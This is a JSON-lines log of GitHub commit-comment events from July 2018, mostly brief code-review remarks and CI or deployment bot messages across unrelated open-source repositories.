{"id":"8023815586","type":"CommitCommentEvent","actor":{"login":"peterbell10"},"repo":{"name":"cuberite/cuberite"},"payload":{"comment":{"id":29846545,"position":10,"line":104,"path":"Tools/ProtoProxy/CMakeLists.txt","commit_id":"757231cc6e777b8f4717d1467ef7efa01c7fde15","created_at":"2018-07-26T16:25:16Z","updated_at":"2018-07-26T16:25:16Z","author_association":"CONTRIBUTOR","body":"Are you trying to build it stand-alone or as part of Cuberite?"}},"created_at":"2018-07-26T16:25:16Z"}
{"id":"8023840457","type":"CommitCommentEvent","actor":{"login":"adeloucas"},"repo":{"name":"adeloucas/cltk"},"payload":{"comment":{"id":29846591,"position":18,"line":39,"path":"cltk/tokenize/line.py","commit_id":"db621d1cce2b481b5d581a05b0b7bceb2b55ac52","created_at":"2018-07-26T16:29:57Z","updated_at":"2018-07-26T16:29:57Z","author_association":"OWNER","body":"Second thought (and please correct me!) -- just made a python file called \"akkadian_tokenizer\" with this class (LineTokenizer) and stuffed it in the tokenize folder. Is it better here or Corpus/Akkadian?\r\n"}},"created_at":"2018-07-26T16:29:57Z"}
{"id":"8023842834","type":"CommitCommentEvent","actor":{"login":"sduckett"},"repo":{"name":"democracyworks/ColoradoRLA"},"payload":{"comment":{"id":29846603,"position":8,"line":8,"path":"RELEASE.md","commit_id":"fdcff374faf43ccf505f712f924c0f117502d6b6","created_at":"2018-07-26T16:30:24Z","updated_at":"2018-07-26T16:30:24Z","author_association":"NONE","body":"We will, though in another PR; this PR is just documenting what we're doing _right now_ so we can be all on the same page."}},"created_at":"2018-07-26T16:30:24Z"}
{"id":"8023842897","type":"CommitCommentEvent","actor":{"login":"bealex"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29846604,"position":7,"line":15,"path":"HowMuch/Code/Presentation/AddGroup/Cells/AddButtonCell/AddButtonCell.swift","commit_id":"7dc58bac782e59fc25ab983599ae515e132a13a4","created_at":"2018-07-26T16:30:25Z","updated_at":"2018-07-26T16:30:25Z","author_association":"COLLABORATOR","body":"Старайся все, совсем все аутлеты, делать private. Это — реализация, не хорошо, когда она торчит наружу."}},"created_at":"2018-07-26T16:30:25Z"}
{"id":"8023843607","type":"CommitCommentEvent","actor":{"login":"mohancm"},"repo":{"name":"DotOS/android_packages_apps_Dialer"},"payload":{"comment":{"id":29846605,"position":null,"line":null,"path":null,"commit_id":"d368a016b5aac3cd9ba57ed13b0dd1f4a5f782f0","created_at":"2018-07-26T16:30:33Z","updated_at":"2018-07-26T16:30:33Z","author_association":"MEMBER","body":"Fine, @Mazda-- \r\nOne fine day, you will know those accusitions were right or wrong.\r\nAnyways, thanks for your Concern.\r\nGood day. Alex "}},"created_at":"2018-07-26T16:30:33Z"}
{"id":"8023848208","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29846615,"position":null,"line":null,"path":null,"commit_id":"4f10f9147a4789c2b510e320edc8797229cc5a9a","created_at":"2018-07-26T16:31:26Z","updated_at":"2018-07-26T16:31:26Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/4f10f9147a4789c2b510e320edc8797229cc5a9a/index.html"}},"created_at":"2018-07-26T16:31:26Z"}
{"id":"8023851161","type":"CommitCommentEvent","actor":{"login":"bealex"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29846618,"position":18,"line":48,"path":"HowMuch/Code/Presentation/Groups/ViewControllers/GroupListViewController.swift","commit_id":"7dc58bac782e59fc25ab983599ae515e132a13a4","created_at":"2018-07-26T16:32:00Z","updated_at":"2018-07-26T16:32:00Z","author_association":"COLLABORATOR","body":"Тут у тебя с отступами проблема. Условие ифа сливается с его внутренностями. Лучше в таком случае делать двойной отступ, или выносить условия за иф, чтобы в ифе они схлопнулись на одну строку."}},"created_at":"2018-07-26T16:32:00Z"}
{"id":"8023854828","type":"CommitCommentEvent","actor":{"login":"liuTeacherA"},"repo":{"name":"liuTeacherA/liuteachera.github.io"},"payload":{"comment":{"id":29846623,"position":null,"line":null,"path":null,"commit_id":"08009854f350c951285dabcbb7c47444beb69db6","created_at":"2018-07-26T16:32:42Z","updated_at":"2018-07-26T16:32:42Z","author_association":"OWNER","body":"merge branch master"}},"created_at":"2018-07-26T16:32:42Z"}
{"id":"8023856780","type":"CommitCommentEvent","actor":{"login":"sduckett"},"repo":{"name":"democracyworks/ColoradoRLA"},"payload":{"comment":{"id":29846628,"position":14,"line":14,"path":"RELEASE.md","commit_id":"fdcff374faf43ccf505f712f924c0f117502d6b6","created_at":"2018-07-26T16:33:05Z","updated_at":"2018-07-26T16:33:05Z","author_association":"NONE","body":"Here, I'm copying what @gws did when CDOS gave him an example. I'll make a note to come back to this before the next release goes up."}},"created_at":"2018-07-26T16:33:05Z"}
{"id":"8023856984","type":"CommitCommentEvent","actor":{"login":"bealex"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29846629,"position":5,"line":12,"path":"HowMuch/Code/Presentation/Groups/ViewControllers/PurchaseListViewController.swift","commit_id":"7dc58bac782e59fc25ab983599ae515e132a13a4","created_at":"2018-07-26T16:33:08Z","updated_at":"2018-07-26T16:33:08Z","author_association":"COLLABORATOR","body":"Может, `Section` будет проще? Cell - Section - Header."}},"created_at":"2018-07-26T16:33:08Z"}
{"id":"8023861115","type":"CommitCommentEvent","actor":{"login":"nealmcb"},"repo":{"name":"democracyworks/ColoradoRLA"},"payload":{"comment":{"id":29846638,"position":8,"line":8,"path":"RELEASE.md","commit_id":"fdcff374faf43ccf505f712f924c0f117502d6b6","created_at":"2018-07-26T16:33:56Z","updated_at":"2018-07-26T16:33:56Z","author_association":"COLLABORATOR","body":"Thanks - makes sense."}},"created_at":"2018-07-26T16:33:56Z"}
{"id":"8023862834","type":"CommitCommentEvent","actor":{"login":"kevpl"},"repo":{"name":"puppetlabs/beaker"},"payload":{"comment":{"id":29846645,"position":16,"line":573,"path":"lib/beaker/dsl/helpers/host_helpers.rb","commit_id":"6fa2744a5dec68b694657aab86f4884e7e21bd6b","created_at":"2018-07-26T16:34:17Z","updated_at":"2018-07-26T16:34:17Z","author_association":"CONTRIBUTOR","body":"yeah. beaker's master branch is 4.0 at this point, so that's fine."}},"created_at":"2018-07-26T16:34:17Z"}
{"id":"8023863581","type":"CommitCommentEvent","actor":{"login":"bealex"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29846646,"position":89,"line":88,"path":"HowMuch/Code/Presentation/Groups/ViewControllers/PurchaseListViewController.swift","commit_id":"7dc58bac782e59fc25ab983599ae515e132a13a4","created_at":"2018-07-26T16:34:27Z","updated_at":"2018-07-26T16:34:27Z","author_association":"COLLABORATOR","body":"Хм. Не понятно, зачем создавать view, если заголовок не нужен."}},"created_at":"2018-07-26T16:34:27Z"}
{"id":"8023865640","type":"CommitCommentEvent","actor":{"login":"martyndykstra"},"repo":{"name":"pfsense/FreeBSD-ports"},"payload":{"comment":{"id":29846650,"position":null,"line":null,"path":null,"commit_id":"7c2caf5a2b8f4169832e30d03ab8987198f86bda","created_at":"2018-07-26T16:34:49Z","updated_at":"2018-07-26T16:34:49Z","author_association":"NONE","body":"> Since I installed the version 0.59_2 is the SNI functionality not longer working. The browser is receiving only the main certificate. The version 0.54_2 was working fine.\r\n\r\nI have the same problem\r\n\r\n\r\n"}},"created_at":"2018-07-26T16:34:49Z"}
{"id":"8023870582","type":"CommitCommentEvent","actor":{"login":"samuelxyz"},"repo":{"name":"samuelxyz/motlb"},"payload":{"comment":{"id":29846658,"position":null,"line":null,"path":null,"commit_id":"186dcf03040b253957a8b44af73504efd7192e58","created_at":"2018-07-26T16:35:47Z","updated_at":"2018-07-26T16:35:47Z","author_association":"OWNER","body":"Derp. Ignore the part about rendering code."}},"created_at":"2018-07-26T16:35:47Z"}
{"id":"8023871939","type":"CommitCommentEvent","actor":{"login":"bealex"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29846660,"position":47,"line":50,"path":"HowMuch/Code/Presentation/Groups/ViewControllers/PurchaseListViewController.swift","commit_id":"7dc58bac782e59fc25ab983599ae515e132a13a4","created_at":"2018-07-26T16:36:03Z","updated_at":"2018-07-26T16:36:03Z","author_association":"COLLABORATOR","body":"Лучше здесь не делать делегат, но сделать замыкание-колбек. С делегатами жить чуть сложнее."}},"created_at":"2018-07-26T16:36:03Z"}
{"id":"8023874502","type":"CommitCommentEvent","actor":{"login":"Apocrathia"},"repo":{"name":"Apocrathia/home-assistant-config"},"payload":{"comment":{"id":29846665,"position":null,"line":null,"path":null,"commit_id":"93458ece1cdeba29b75c57a45d75a6049c1a661e","created_at":"2018-07-26T16:36:33Z","updated_at":"2018-07-26T16:36:33Z","author_association":"OWNER","body":"The funny lesson learned here is that the panel_iframe does not like relative URLs.\r\n\r\nhttps://github.com/home-assistant/home-assistant/blob/c2fe0d0120f28c6f33cf5384633d7b6a65946620/homeassistant/components/panel_iframe.py#L18\r\n\r\nIt looks like there was a commit to allow relative URLs earlier this year. Not sure what happened.\r\n\r\nhttps://github.com/home-assistant/home-assistant.io/pull/4477"}},"created_at":"2018-07-26T16:36:33Z"}
{"id":"8023877933","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29846671,"position":null,"line":null,"path":null,"commit_id":"75d5073e9b74d1c6f567e5a231cda99ca6fd66d5","created_at":"2018-07-26T16:37:15Z","updated_at":"2018-07-26T16:37:15Z","author_association":"COLLABORATOR","body":"Makefile is being worked on so less paths will be hardcoded like this quick fix is at the moment."}},"created_at":"2018-07-26T16:37:15Z"}
{"id":"8023878238","type":"CommitCommentEvent","actor":{"login":"cjchapman"},"repo":{"name":"adobe-type-tools/afdko"},"payload":{"comment":{"id":29846672,"position":null,"line":null,"path":null,"commit_id":"ac6ec315271f88b90e8a788b5851bb1fcd4489f2","created_at":"2018-07-26T16:37:19Z","updated_at":"2018-07-26T16:37:19Z","author_association":"CONTRIBUTOR","body":"@anthrotype Not to worry. I was thinking of this first pass with `autohint` as more of a practice run in any case. Now that I've got the `clang-format` and `cpplint` configurations sorted, it should be easier to clean up the other modules."}},"created_at":"2018-07-26T16:37:19Z"}
{"id":"8023880585","type":"CommitCommentEvent","actor":{"login":"eswarasai"},"repo":{"name":"MARKETProtocol/service-listener"},"payload":{"comment":{"id":29846676,"position":9,"line":38,"path":"package.json","commit_id":"e8d0ced385eb3906c1b09b965ee856f3c09d6f02","created_at":"2018-07-26T16:37:46Z","updated_at":"2018-07-26T16:37:46Z","author_association":"MEMBER","body":"@dmvt -- Any reason why we aren't using the latest version `0.1.1` instead of git?"}},"created_at":"2018-07-26T16:37:46Z"}
{"id":"8023880794","type":"CommitCommentEvent","actor":{"login":"bealex"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29846677,"position":89,"line":88,"path":"HowMuch/Code/Presentation/Groups/ViewControllers/PurchaseListViewController.swift","commit_id":"7dc58bac782e59fc25ab983599ae515e132a13a4","created_at":"2018-07-26T16:37:49Z","updated_at":"2018-07-26T16:37:49Z","author_association":"COLLABORATOR","body":"Поскольку у тебя все-равно есть эта вьюшка в отдельном классе, думаю, удобнее будет вынести эту загрузку туда. Чтобы, при реиспользовании, не пришлось опять этот код писать с загрузкой ниба."}},"created_at":"2018-07-26T16:37:49Z"}
{"id":"8023885105","type":"CommitCommentEvent","actor":{"login":"twalpole"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29846697,"position":6,"line":362,"path":"rb/lib/selenium/webdriver/remote/w3c/bridge.rb","commit_id":"da6efc1b1b4809e20930050fe3a369032d00e1b7","created_at":"2018-07-26T16:38:40Z","updated_at":"2018-07-26T16:38:40Z","author_association":"CONTRIBUTOR","body":"It's been a few years since I tried it but I'm pretty sure the old Firefox driver used to support multiple file upload."}},"created_at":"2018-07-26T16:38:40Z"}
{"id":"8023886032","type":"CommitCommentEvent","actor":{"login":"lukeeey"},"repo":{"name":"GoMint/GoMint"},"payload":{"comment":{"id":29846699,"position":null,"line":null,"path":null,"commit_id":"8a8a660f28ab493d74fe8c47789e0fcdf133febe","created_at":"2018-07-26T16:38:51Z","updated_at":"2018-07-26T16:38:51Z","author_association":"MEMBER","body":"lmao update your license header year"}},"created_at":"2018-07-26T16:38:51Z"}
{"id":"8023887837","type":"CommitCommentEvent","actor":{"login":"stevenweaver"},"repo":{"name":"veg/hyphy"},"payload":{"comment":{"id":29846703,"position":5,"line":144,"path":"CMakeLists.txt","commit_id":"12536577331c070e140167e23c0e46f14c82363d","created_at":"2018-07-26T16:39:14Z","updated_at":"2018-07-26T16:39:14Z","author_association":"MEMBER","body":"Should we be adding sanitize as a default? According to [documentation](https://clang.llvm.org/docs/MemorySanitizer.html) \r\n\r\n> https://clang.llvm.org/docs/MemorySanitizer.html"}},"created_at":"2018-07-26T16:39:14Z"}
{"id":"8023890505","type":"CommitCommentEvent","actor":{"login":"rouault"},"repo":{"name":"OSGeo/gdal"},"payload":{"comment":{"id":29846707,"position":null,"line":null,"path":null,"commit_id":"58d8db3081d7e0a3ed62121b33a60283303d8880","created_at":"2018-07-26T16:39:45Z","updated_at":"2018-07-26T16:39:45Z","author_association":"MEMBER","body":"> The recommended answer is to check \"/sys/class/dmi/id/product_name\", which will be \"Google Compute Engine\" for all modern GCE VMs (specifically, VMs started later than mid-2016).\r\n\r\nThanks. Implemented"}},"created_at":"2018-07-26T16:39:45Z"}
{"id":"8023890853","type":"CommitCommentEvent","actor":{"login":"fdlk"},"repo":{"name":"molgenis/molgenis-js-test"},"payload":{"comment":{"id":29846708,"position":null,"line":null,"path":null,"commit_id":"58da561d46adf4961148aeda82b871512468f133","created_at":"2018-07-26T16:39:49Z","updated_at":"2018-07-26T16:39:49Z","author_association":"MEMBER","body":"How about using `milestone()` for this? https://jenkins.io/blog/2016/10/16/stage-lock-milestone/"}},"created_at":"2018-07-26T16:39:49Z"}
{"id":"8023891809","type":"CommitCommentEvent","actor":{"login":"joshcooper"},"repo":{"name":"puppetlabs/beaker"},"payload":{"comment":{"id":29846711,"position":16,"line":573,"path":"lib/beaker/dsl/helpers/host_helpers.rb","commit_id":"6fa2744a5dec68b694657aab86f4884e7e21bd6b","created_at":"2018-07-26T16:40:00Z","updated_at":"2018-07-26T16:40:00Z","author_association":"MEMBER","body":"Some of our pipelines install from beaker#master:\r\n\r\n```\r\njenkii/platform/projects/puppet-agent.yaml:        p_beaker_version: 'git://github.com/puppetlabs/beaker#master'\r\njenkii/platform/projects/puppet-runtime.yaml:        p_beaker_version: 'git://github.com/puppetlabs/beaker#master'\r\njenkii/platform/projects/vanagon-generic-builder.yaml:        p_beaker_version: 'git://github.com/puppetlabs/beaker#master'\r\nresources/defaults/imaging-packer-defaults.yaml:    p_beaker_version: 'git://github.com/puppetlabs/beaker#master'\r\n```\r\n\r\nAnd are breaking, e.g. https://jenkins-master-prod-1.delivery.puppetlabs.net/view/puppet-agent/view/Acceptance%20Suites/view/master/view/Suite/job/platform_puppet-agent_puppet-agent-integration-suite_daily-master/271/\r\n\r\n @branan @speedofdark Do we need to create a beaker#3.x branch and pull from there instead? Should we pin back to \"~> 3.x\"? I'm not sure what led us to installing from master."}},"created_at":"2018-07-26T16:40:00Z"}
{"id":"8023892713","type":"CommitCommentEvent","actor":{"login":"nichcream"},"repo":{"name":"nichcream/android_device_xiaomi_land"},"payload":{"comment":{"id":29846713,"position":null,"line":null,"path":null,"commit_id":"10c192abfa0cf773c13444df292373e8a8d0cb81","created_at":"2018-07-26T16:40:11Z","updated_at":"2018-07-26T16:40:11Z","author_association":"OWNER","body":"Pull back my last comments, you're right. I'll rework this.\r\n"}},"created_at":"2018-07-26T16:40:11Z"}
{"id":"8023893002","type":"CommitCommentEvent","actor":{"login":"sduckett"},"repo":{"name":"democracyworks/ColoradoRLA"},"payload":{"comment":{"id":29846715,"position":8,"line":8,"path":"RELEASE.md","commit_id":"fdcff374faf43ccf505f712f924c0f117502d6b6","created_at":"2018-07-26T16:40:14Z","updated_at":"2018-07-26T16:40:14Z","author_association":"NONE","body":"(In the end, I want to say something like `make release $SHA`.)"}},"created_at":"2018-07-26T16:40:14Z"}
{"id":"8023897572","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29846722,"position":null,"line":null,"path":null,"commit_id":"8c6a38ae74be4ac99056e05742d42148e0b3206c","created_at":"2018-07-26T16:41:08Z","updated_at":"2018-07-26T16:41:08Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2326 of 2326 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c6a38ae74be4ac99056e05742d42148e0b3206c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c6a38ae74be4ac99056e05742d42148e0b3206c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c6a38ae74be4ac99056e05742d42148e0b3206c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-26T16:41:08Z"}
{"id":"8023900239","type":"CommitCommentEvent","actor":{"login":"camwiegert"},"repo":{"name":"ionic-team/component-preview"},"payload":{"comment":{"id":29846728,"position":null,"line":null,"path":null,"commit_id":"efabe482a62c55fc3f256ea2f4125b56f4f5d72b","created_at":"2018-07-26T16:41:40Z","updated_at":"2018-07-26T16:41:40Z","author_association":"MEMBER","body":"😄"}},"created_at":"2018-07-26T16:41:40Z"}
{"id":"8023900893","type":"CommitCommentEvent","actor":{"login":"ysjeon7"},"repo":{"name":"ysjeon7/hello-world"},"payload":{"comment":{"id":29846729,"position":null,"line":null,"path":null,"commit_id":"77935bc41ba9cc8d781ba665b0e397a7ed6c3537","created_at":"2018-07-26T16:41:47Z","updated_at":"2018-07-26T16:41:47Z","author_association":"OWNER","body":"I understood what to change."}},"created_at":"2018-07-26T16:41:47Z"}
{"id":"8023901843","type":"CommitCommentEvent","actor":{"login":"broxen"},"repo":{"name":"Segs/Segs"},"payload":{"comment":{"id":29846730,"position":40,"line":376,"path":"Projects/CoX/Servers/MapServer/Events/EntitiesResponse.cpp","commit_id":"1a1b315aaeebcd19d844136a598f474cb9ec4b10","created_at":"2018-07-26T16:41:59Z","updated_at":"2018-07-26T16:41:59Z","author_association":"COLLABORATOR","body":"`cd.m_powersets.end()`"}},"created_at":"2018-07-26T16:41:59Z"}
{"id":"8023902073","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/mputil-feedstock"},"payload":{"comment":{"id":29846731,"position":null,"line":null,"path":null,"commit_id":"4eca20d26193919e6f9086418b85f95b21949efd","created_at":"2018-07-26T16:42:02Z","updated_at":"2018-07-26T16:42:02Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @jenzopr was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-26T16:42:02Z"}
{"id":"8023903698","type":"CommitCommentEvent","actor":{"login":"broxen"},"repo":{"name":"Segs/Segs"},"payload":{"comment":{"id":29846736,"position":7,"line":63,"path":"Projects/CoX/Common/GameData/chardata_serializers.cpp","commit_id":"1a1b315aaeebcd19d844136a598f474cb9ec4b10","created_at":"2018-07-26T16:42:22Z","updated_at":"2018-07-26T16:42:22Z","author_association":"COLLABORATOR","body":"Need to rename boost to enhancement"}},"created_at":"2018-07-26T16:42:22Z"}
{"id":"8023905452","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29846739,"position":null,"line":null,"path":null,"commit_id":"8c6a38ae74be4ac99056e05742d42148e0b3206c","created_at":"2018-07-26T16:42:43Z","updated_at":"2018-07-26T16:42:43Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c6a38ae74be4ac99056e05742d42148e0b3206c-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-26T16:42:43Z"}
{"id":"8023905806","type":"CommitCommentEvent","actor":{"login":"ysjeon7"},"repo":{"name":"ysjeon7/hello-world"},"payload":{"comment":{"id":29846740,"position":null,"line":null,"path":null,"commit_id":"77935bc41ba9cc8d781ba665b0e397a7ed6c3537","created_at":"2018-07-26T16:42:47Z","updated_at":"2018-07-26T16:42:47Z","author_association":"OWNER","body":"recomment again."}},"created_at":"2018-07-26T16:42:47Z"}
{"id":"8023906484","type":"CommitCommentEvent","actor":{"login":"broxen"},"repo":{"name":"Segs/Segs"},"payload":{"comment":{"id":29846742,"position":17,"line":114,"path":"Projects/CoX/Common/NetStructures/Character.cpp","commit_id":"1a1b315aaeebcd19d844136a598f474cb9ec4b10","created_at":"2018-07-26T16:42:56Z","updated_at":"2018-07-26T16:42:56Z","author_association":"COLLABORATOR","body":"Can remove this comment"}},"created_at":"2018-07-26T16:42:56Z"}
{"id":"8023906990","type":"CommitCommentEvent","actor":{"login":"scottjmitchell"},"repo":{"name":"scottjmitchell/drafter"},"payload":{"comment":{"id":29846744,"position":null,"line":null,"path":null,"commit_id":"f838a5777f6d7433464b9ee29a5aaa46a3dcee36","created_at":"2018-07-26T16:43:01Z","updated_at":"2018-07-26T16:43:01Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Remove Workspace.xml from git](https://trello.com/c/wKtrh13z/40-remove-workspacexml-from-git)"}},"created_at":"2018-07-26T16:43:01Z"}
{"id":"8023910084","type":"CommitCommentEvent","actor":{"login":"bkueng"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":29846750,"position":5,"line":853,"path":"src/modules/mavlink/mavlink_receiver.cpp","commit_id":"9f99370a126efb8d69e351f2ff2f3da8e5718fc5","created_at":"2018-07-26T16:43:37Z","updated_at":"2018-07-26T16:43:37Z","author_association":"MEMBER","body":"Can you please use `static_assert`?"}},"created_at":"2018-07-26T16:43:37Z"}
{"id":"8023911677","type":"CommitCommentEvent","actor":{"login":"broxen"},"repo":{"name":"Segs/Segs"},"payload":{"comment":{"id":29846755,"position":30,"line":127,"path":"Projects/CoX/Common/NetStructures/Character.cpp","commit_id":"1a1b315aaeebcd19d844136a598f474cb9ec4b10","created_at":"2018-07-26T16:43:55Z","updated_at":"2018-07-26T16:43:55Z","author_association":"COLLABORATOR","body":"Can rename CharacterPowerBoost to CharacterPowerEnhance"}},"created_at":"2018-07-26T16:43:55Z"}
{"id":"8023915051","type":"CommitCommentEvent","actor":{"login":"broxen"},"repo":{"name":"Segs/Segs"},"payload":{"comment":{"id":29846763,"position":46,"line":58,"path":"Projects/CoX/Common/NetStructures/Powers.h","commit_id":"1a1b315aaeebcd19d844136a598f474cb9ec4b10","created_at":"2018-07-26T16:44:31Z","updated_at":"2018-07-26T16:44:31Z","author_association":"COLLABORATOR","body":"Can probably remove this and calculate it as needed"}},"created_at":"2018-07-26T16:44:31Z"}
{"id":"8023917677","type":"CommitCommentEvent","actor":{"login":"amandeepmittal"},"repo":{"name":"zeolearn/nodejs-text-tutorial"},"payload":{"comment":{"id":29846766,"position":null,"line":null,"path":null,"commit_id":"e87df4296dad412be15ee9be2ac11cd3f1c65e06","created_at":"2018-07-26T16:45:00Z","updated_at":"2018-07-26T16:45:00Z","author_association":"COLLABORATOR","body":"Okay. Let me get back to you."}},"created_at":"2018-07-26T16:45:00Z"}
{"id":"8023918378","type":"CommitCommentEvent","actor":{"login":"broxen"},"repo":{"name":"Segs/Segs"},"payload":{"comment":{"id":29846769,"position":74,"line":76,"path":"Projects/CoX/Common/NetStructures/Powers.h","commit_id":"1a1b315aaeebcd19d844136a598f474cb9ec4b10","created_at":"2018-07-26T16:45:09Z","updated_at":"2018-07-26T16:45:09Z","author_association":"COLLABORATOR","body":"Cleanup these members"}},"created_at":"2018-07-26T16:45:09Z"}
{"id":"8023922519","type":"CommitCommentEvent","actor":{"login":"broxen"},"repo":{"name":"Segs/Segs"},"payload":{"comment":{"id":29846777,"position":129,"line":431,"path":"Projects/CoX/Servers/MapServer/Events/EntitiesResponse.cpp","commit_id":"1a1b315aaeebcd19d844136a598f474cb9ec4b10","created_at":"2018-07-26T16:45:55Z","updated_at":"2018-07-26T16:45:55Z","author_association":"COLLABORATOR","body":"Use new active powers vector for this."}},"created_at":"2018-07-26T16:45:55Z"}
{"id":"8023922913","type":"CommitCommentEvent","actor":{"login":"blyxxyz"},"repo":{"name":"vectorhacker/pygeteventstore"},"payload":{"comment":{"id":29846778,"position":null,"line":null,"path":null,"commit_id":"b3fa2acb9bb450e037d3100a86021cc6eb2d2e4c","created_at":"2018-07-26T16:46:00Z","updated_at":"2018-07-26T16:46:00Z","author_association":"NONE","body":"Thank you, it installs now."}},"created_at":"2018-07-26T16:46:00Z"}
{"id":"8023925012","type":"CommitCommentEvent","actor":{"login":"easybuckaroo"},"repo":{"name":"easybuckaroo/frockwith"},"payload":{"comment":{"id":29846779,"position":null,"line":null,"path":null,"commit_id":"eb0c49b9a8840035662e5a2aa30de8a93c8882f6","created_at":"2018-07-26T16:46:24Z","updated_at":"2018-07-26T16:46:24Z","author_association":"OWNER","body":"Created multidev environment [frockwith#ci-2](https://dashboard.pantheon.io/sites/46420f8c-c38d-48e0-a6c7-03b660a95712#ci-2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-2-frockwith.pantheonsite.io/)"}},"created_at":"2018-07-26T16:46:24Z"}
{"id":"8023925774","type":"CommitCommentEvent","actor":{"login":"broxen"},"repo":{"name":"Segs/Segs"},"payload":{"comment":{"id":29846781,"position":100,"line":407,"path":"Projects/CoX/Servers/MapServer/Events/EntitiesResponse.cpp","commit_id":"1a1b315aaeebcd19d844136a598f474cb9ec4b10","created_at":"2018-07-26T16:46:33Z","updated_at":"2018-07-26T16:46:33Z","author_association":"COLLABORATOR","body":"Make this a member"}},"created_at":"2018-07-26T16:46:33Z"}
{"id":"8023927426","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29846785,"position":null,"line":null,"path":null,"commit_id":"572312bbf195bde171bf4c27be8a6f706c76818a","created_at":"2018-07-26T16:46:52Z","updated_at":"2018-07-26T16:46:52Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-285](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-285).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-285-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-26T16:46:52Z"}
{"id":"8023929277","type":"CommitCommentEvent","actor":{"login":"broxen"},"repo":{"name":"Segs/Segs"},"payload":{"comment":{"id":29846793,"position":93,"line":91,"path":"Projects/CoX/Common/NetStructures/Powers.h","commit_id":"1a1b315aaeebcd19d844136a598f474cb9ec4b10","created_at":"2018-07-26T16:47:16Z","updated_at":"2018-07-26T16:47:16Z","author_association":"COLLABORATOR","body":"Rename to m_tray_items"}},"created_at":"2018-07-26T16:47:16Z"}
{"id":"8023929696","type":"CommitCommentEvent","actor":{"login":"JuliaPartridge"},"repo":{"name":"AquaQAnalytics/TorQ"},"payload":{"comment":{"id":29846794,"position":null,"line":null,"path":null,"commit_id":"04ebf45429d3cc77ca89f7ed528459d80236d83b","created_at":"2018-07-26T16:47:20Z","updated_at":"2018-07-26T16:47:20Z","author_association":"CONTRIBUTOR","body":"I must have an older version of torq.q - ignore this."}},"created_at":"2018-07-26T16:47:20Z"}
{"id":"8023935889","type":"CommitCommentEvent","actor":{"login":"getsanjeev"},"repo":{"name":"getsanjeev/ACTIVESEGMENTATION"},"payload":{"comment":{"id":29846804,"position":null,"line":null,"path":null,"commit_id":"d46360c6212cac8c9ac8a994d515c3673ceb10ad","created_at":"2018-07-26T16:48:37Z","updated_at":"2018-07-26T16:48:37Z","author_association":"OWNER","body":"sorry, remove the main method garbage"}},"created_at":"2018-07-26T16:48:37Z"}
